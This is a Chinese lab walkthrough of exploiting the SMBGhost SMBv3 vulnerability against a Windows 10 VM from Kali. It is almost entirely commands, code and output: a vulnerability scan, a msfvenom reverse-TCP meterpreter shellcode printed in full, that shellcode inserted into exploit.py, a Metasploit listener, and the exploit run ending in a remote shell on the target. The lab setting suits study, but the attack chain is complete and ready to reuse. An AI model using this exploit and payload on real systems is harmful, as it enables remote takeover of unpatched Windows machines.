一、环境
系统         版本             IP地址
Kali     Kali2020.1     192.168.101.129
Windows  Win10-1903版   192.168.101.128
二、实验步骤
1.上传相关软件包(SMBGhost_RCE_PoC-master、SMBGhost-master)

图片 1.png

2.查看相关软件包是否上传成功
root@kali:~# ls
公共  视频  文档  音乐  SMBGhost-master.zip
模板  图片  下载  桌面  SMBGhost_RCE_PoC-master.zip
root@kali:~#

3.解压SMBGhost-master.zip压缩包并查看该解压出的文件
root@kali:~# unzip SMBGhost-master.zip
Archive:  SMBGhost-master.zip
   creating: SMBGhost-master/
  inflating: SMBGhost-master/README.md  
  inflating: SMBGhost-master/scanner.py  
  inflating: SMBGhost-master/SMBGhost.pcap  
root@kali:~# cd SMBGhost-master/
root@kali:~/SMBGhost-master# ls
README.md  scanner.py  SMBGhost.pcap
root@kali:~/SMBGhost-master#
4.使用Python3结合SMBGhost-master中的scanner.py文件进行测试是否存在漏洞
root@kali:~/SMBGhost-master# python3 scanner.py  192.168.101.128
192.168.101.128 Vulnerable
root@kali:~/SMBGhost-master#
5.解压SMBGhost_RCE_PoC-master.zip压缩包并查看解压出的文件
root@kali:~/SMBGhost-master# cd 
root@kali:~# unzip SMBGhost_RCE_PoC-master.zip 
Archive:  SMBGhost_RCE_PoC-master.zip
f55e6abd47cb3a4f771c965053a5a92133a18781
   creating: SMBGhost_RCE_PoC-master/
  inflating: SMBGhost_RCE_PoC-master/.gitignore  
  inflating: SMBGhost_RCE_PoC-master/README.md  
  inflating: SMBGhost_RCE_PoC-master/exploit.py  
  inflating: SMBGhost_RCE_PoC-master/kernel_shellcode.asm  
  inflating: SMBGhost_RCE_PoC-master/lznt1.py  
  inflating: SMBGhost_RCE_PoC-master/smb_win.py  
root@kali:~# cd SMBGhost_RCE_PoC-master/
root@kali:~/SMBGhost_RCE_PoC-master# ls
exploit.py  kernel_shellcode.asm  lznt1.py  README.md  smb_win.py
root@kali:~/SMBGhost_RCE_PoC-master#
6.使用msfvenom工具生成payload并将其回显出来
root@kali:~/SMBGhost_RCE_PoC-master# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.129 lport=9999 -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=7, char=0x00)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 551 (iteration=0)
x64/xor chosen with final size 551
Payload size: 551 bytes
Final size of python file: 2688 bytes
buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
buf += b"\xab\xd6\xaa\x6c\x86"
root@kali:~/SMBGhost_RCE_PoC-master#
7.修改exploit.py文件将第91行至127行进行删除
root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py 
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
     1  #!/usr/bin/env python
     2  
     3  import sys
     4  import socket
     5  import struct
     6  import argparse
     7  
     8  from lznt1 import compress, compress_evil
     9  from smb_win import smb_negotiate, smb_compress
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
90  
    91  
    92  
    93  PML4_SELFREF = 0
    94  PHAL_HEAP = 0
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
   420  if __name__ == "__main__":
   421      parser = argparse.ArgumentParser()
   422      parser.add_argument("-ip", help="IP address of target", required=True)
   423      parser.add_argument("-p", "--port", default=445, help="SMB port, \
   424                          default: 445", required=False, type=int)
   425      args = parser.parse_args()
   426  
   427      do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
8.将上面msfvenom回显出的内容复制到exploit.py文件的第91行位置,并在粘贴的buf内容后一行写入USER_PAYLOAD = buf,使exploit.py能够调用该payload
root@kali:~/SMBGhost_RCE_PoC-master# vim exploit.py 
root@kali:~/SMBGhost_RCE_PoC-master# cat -n exploit.py
     1  #!/usr/bin/env python
     2  
     3  import sys
     4  import socket
     5  import struct
     6  import argparse
     7  
     8  from lznt1 import compress, compress_evil
     9  from smb_win import smb_negotiate, smb_compress
    10  
    11  # Use lowstub jmp bytes to signature search
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
    90  
    91  buf =  b""
    92  buf += b"\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05"
    93  buf += b"\xef\xff\xff\xff\x48\xbb\x77\x55\x89\xfd\x29\x7f\x6c"
    94  buf += b"\x86\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
    95  buf += b"\x8b\x1d\x0a\x19\xd9\x97\xa0\x86\x77\x55\xc8\xac\x68"
    96  buf += b"\x2f\x3e\xd7\x21\x1d\xb8\x2f\x4c\x37\xe7\xd4\x17\x1d"
    97  buf += b"\x02\xaf\x31\x37\xe7\xd4\x57\x1d\x02\x8f\x79\x37\x63"
    98  buf += b"\x31\x3d\x1f\xc4\xcc\xe0\x37\x5d\x46\xdb\x69\xe8\x81"
    99  buf += b"\x2b\x53\x4c\xc7\xb6\x9c\x84\xbc\x28\xbe\x8e\x6b\x25"
   100  buf += b"\x14\xd8\xb5\xa2\x2d\x4c\x0d\x35\x69\xc1\xfc\xf9\x19"
   101  buf += b"\xed\xfe\x6f\x5e\x8b\xf2\xac\x0d\x6c\x86\x77\xde\x09"
   102  buf += b"\x75\x29\x7f\x6c\xce\xf2\x95\xfd\x9a\x61\x7e\xbc\xd6"
   103  buf += b"\xfc\x1d\x91\xb9\xa2\x3f\x4c\xcf\x76\x85\x6a\xab\x61"
   104  buf += b"\x80\xa5\xc7\xfc\x61\x01\xb5\x28\xa9\x21\xb7\xbe\x1d"
   105  buf += b"\xb8\x3d\x85\x3e\xad\x4f\x7a\x14\x88\x3c\x11\x9f\x19"
   106  buf += b"\x77\x3b\x56\xc5\xd9\x21\x3a\x55\x57\x02\x8d\xd1\xb9"
   107  buf += b"\xa2\x3f\x48\xcf\x76\x85\xef\xbc\xa2\x73\x24\xc2\xfc"
   108  buf += b"\x15\x95\xb4\x28\xaf\x2d\x0d\x73\xdd\xc1\xfc\xf9\x3e"
   109  buf += b"\x34\xc7\x2f\x0b\xd0\xa7\x68\x27\x2d\xdf\x36\x0f\xc1"
   110  buf += b"\x7e\xc5\x5f\x2d\xd4\x88\xb5\xd1\xbc\x70\x25\x24\x0d"
   111  buf += b"\x65\xbc\xc2\x02\xd6\x80\x31\xcf\xc9\x22\xfa\xcf\x76"
   112  buf += b"\x4c\x5e\x86\x77\x14\xdf\xb4\xa0\x99\x24\x07\x9b\xf5"
   113  buf += b"\x88\xfd\x29\x36\xe5\x63\x3e\xe9\x8b\xfd\x0e\x70\xac"
   114  buf += b"\x2e\x12\xd4\xc8\xa9\x60\xf6\x88\xca\xfe\xa4\xc8\x47"
   115  buf += b"\x65\x08\x4a\x81\x88\x80\xc5\x74\xc3\x17\x6d\x87\x77"
   116  buf += b"\x55\xd0\xbc\x93\x56\xec\xed\x77\xaa\x5c\x97\x23\x3e"
   117  buf += b"\x32\xd6\x27\x18\xb8\x34\x64\x4e\xac\xce\x88\x95\xc1"
   118  buf += b"\x74\xeb\x37\x93\x46\x3f\xdc\x48\xbc\x93\x95\x63\x59"
   119  buf += b"\x97\xaa\x5c\xb5\xa0\xb8\x06\x96\x36\x0d\xc5\x74\xcb"
   120  buf += b"\x37\xe5\x7f\x36\xef\x10\x58\x5d\x1e\x93\x53\xf2\x95"
   121  buf += b"\xfd\xf7\x60\x80\xa2\xf3\x92\xbd\x1a\xfd\x29\x7f\x24"
   122  buf += b"\x05\x9b\x45\xc1\x74\xcb\x32\x5d\x4f\x1d\x51\xc8\xa5"
   123  buf += b"\x61\xf6\x95\xc7\xcd\x57\x50\x35\x76\x80\xb9\x05\x8f"
   124  buf += b"\x55\xf7\xa8\x61\xfc\xa8\xa6\x29\xdc\x7f\x97\x69\x3e"
   125  buf += b"\x35\xee\x77\x45\x89\xfd\x68\x27\x24\x0f\x85\x1d\xb8"
   126  buf += b"\x34\x68\xc5\x34\x22\x24\xb0\x76\x28\x61\xf6\xaf\xcf"
   127  buf += b"\xfe\x92\xc4\xcc\xe0\x36\xe5\x76\x3f\xdc\x53\xb5\xa0"
   128  buf += b"\x86\x2d\x3c\x75\x8c\x41\xa2\xd6\xaa\xef\x7e\x77\x28"
   129  buf += b"\xa1\xa5\x68\x28\x35\xee\x77\x15\x89\xfd\x68\x27\x06"
   130  buf += b"\x86\x2d\x14\x33\xf6\x06\x70\x5c\x79\xa2\x02\xd0\xbc"
   131  buf += b"\x93\x0a\x02\xcb\x16\xaa\x5c\xb4\xd6\xb1\x85\xba\x88"
   132  buf += b"\xaa\x76\xb5\x28\xbc\x24\xaf\xb1\x1d\x0c\x0b\x5c\xcb"
   133  buf += b"\x2d\x79\x90\x0d\xe3\xfd\x70\x36\xab\x44\x87\xe0\x2b"
   134  buf += b"\xab\xd6\xaa\x6c\x86"
   135  
   136  USER_PAYLOAD = buf
   137  
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。省略
   465  if __name__ == "__main__":
   466      parser = argparse.ArgumentParser()
   467      parser.add_argument("-ip", help="IP address of target", required=True)
   468      parser.add_argument("-p", "--port", default=445, help="SMB port, \
   469                          default: 445", required=False, type=int)
   470      args = parser.parse_args()
   471  
   472      do_rce(args.ip, args.port)
root@kali:~/SMBGhost_RCE_PoC-master#
9.启动PostgreSQL服务并初始化msf数据库
root@kali:~/SMBGhost_RCE_PoC-master# service postgresql start
root@kali:~/SMBGhost_RCE_PoC-master# msfdb init
[i] Database already started
[+] Creating database user 'msf'
为新角色输入的口令: 
再输入一遍: 
[+] Creating databases 'msf'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating databases 'msf_test'
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run “touch ~/.hushlogin” to hide this message)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
root@kali:~/SMBGhost_RCE_PoC-master#
10.启动msfconsole,配置监听模块
root@kali:~/SMBGhost_RCE_PoC-master# msfconsole 
                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/
       =[ metasploit v5.0.71-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > service  postgresql start
[*] exec: service  postgresql start
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.101.129
lhost => 192.168.101.129
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) >
11.开始攻击,并查看拿到的权限
root@kali:~/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.101.128
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff78f80000000
[+] found PML4 self-ref entry 197
[+] found HalpInterruptController at fffff78f80001478
[+] found HalpApicRequestInterrupt at fffff8011b6c5bb0
[+] built shellcode!
[+] KUSER_SHARED_DATA PTE at ffffcbfbc0000000
[+] KUSER_SHARED_DATA PTE NX bit cleared!
[+] Wrote shellcode at fffff78000000950!
[+] Press a key to execute shellcode!
[+] overwrote HalpInterruptController pointer, should have execution shortly...
root@kali:~/SMBGhost_RCE_PoC-master#

msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.101.129:9999 
[*] Sending stage (206403 bytes) to 192.168.101.128
[*] Meterpreter session 1 opened (192.168.101.129:9999 -> 192.168.101.128:49686) at 2021-02-24 02:11:01 -0500

meterpreter > shell
Process 5968 created.
Channel 1 created.
Microsoft Windows [版本 10.0.18362.30]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\Windows\system32>ipconfig       
Windows IP 配置
以太网适配器 Ethernet0:
   连接特定的 DNS 后缀 . . . . . . . : 
   本地链接 IPv6 地址. . . . . . . . : fe80::79ac:3add:3bd3:5ac7%10
   IPv4 地址 . . . . . . . . . . . . : 192.168.101.128
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.101.2
以太网适配器 蓝牙网络连接:
   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . : 
C:\Windows\system32>